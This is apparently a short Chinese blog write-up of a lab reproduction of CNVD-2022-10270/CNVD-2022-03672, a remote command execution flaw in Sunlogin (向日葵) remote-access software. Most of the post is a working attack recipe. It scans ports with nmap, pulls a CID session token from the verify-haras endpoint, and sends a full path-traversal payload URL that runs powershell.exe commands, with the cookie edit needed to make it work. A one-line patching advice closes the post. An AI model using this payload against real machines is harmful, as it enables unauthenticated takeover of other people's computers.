向日葵CNVD-2022-10270/CNVD-2022-03672 复现
向日葵是生活工作中最常用的一款远程办公工具之一。也是目前国内市面上用的最多的一款工具。本文来谈谈关于其
CNVD-2022-10270/CNVD-2022-03672
漏洞的利用和复现。
实验环境
向日葵 <= 11.0.0.33
Kali Linux
端口扫描
我们首先在本地环境安装11.0.0.33
的低版本向日葵。安装完成后,并用nmap对靶场进行端口扫描。

安装完成后,在kali中利用nmap端口扫描。
nmap -p 45000-55000 192.168.50.105
如下图,我们可以看到目标存在61376
61387
这几个端口。

当然,为了方便我们可以利用python脚本快速检测,支持整个网段扫描。

漏洞复现
在浏览器中访问ip
+端口号
+cgi-bin/rpc?action=verify-haras (端口号:每一个都尝试,直到获取到session值CID
)

通过上述方法,我们确定了目标的端口。现在我们便可以利用payload工具进行测试。payload
http://192.168.50.105:61387/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami
访问paylaod,并在burp中进行抓包。

修改Cookie:YqRx8XziEo3PCASesFfsfP5tZWk344Zl
为Cookie: CID=YqRx8XziEo3PCASesFfsfP5tZWk344Zl
效果如下:

同样,我们只需修改后面的whoami
为其他的命令如ipconfig
即可。


安全建议
此漏洞算是比较高危的漏洞,请尽快更新到最新版本。
更多精彩文章 欢迎关注微信公众号 kali黑客笔记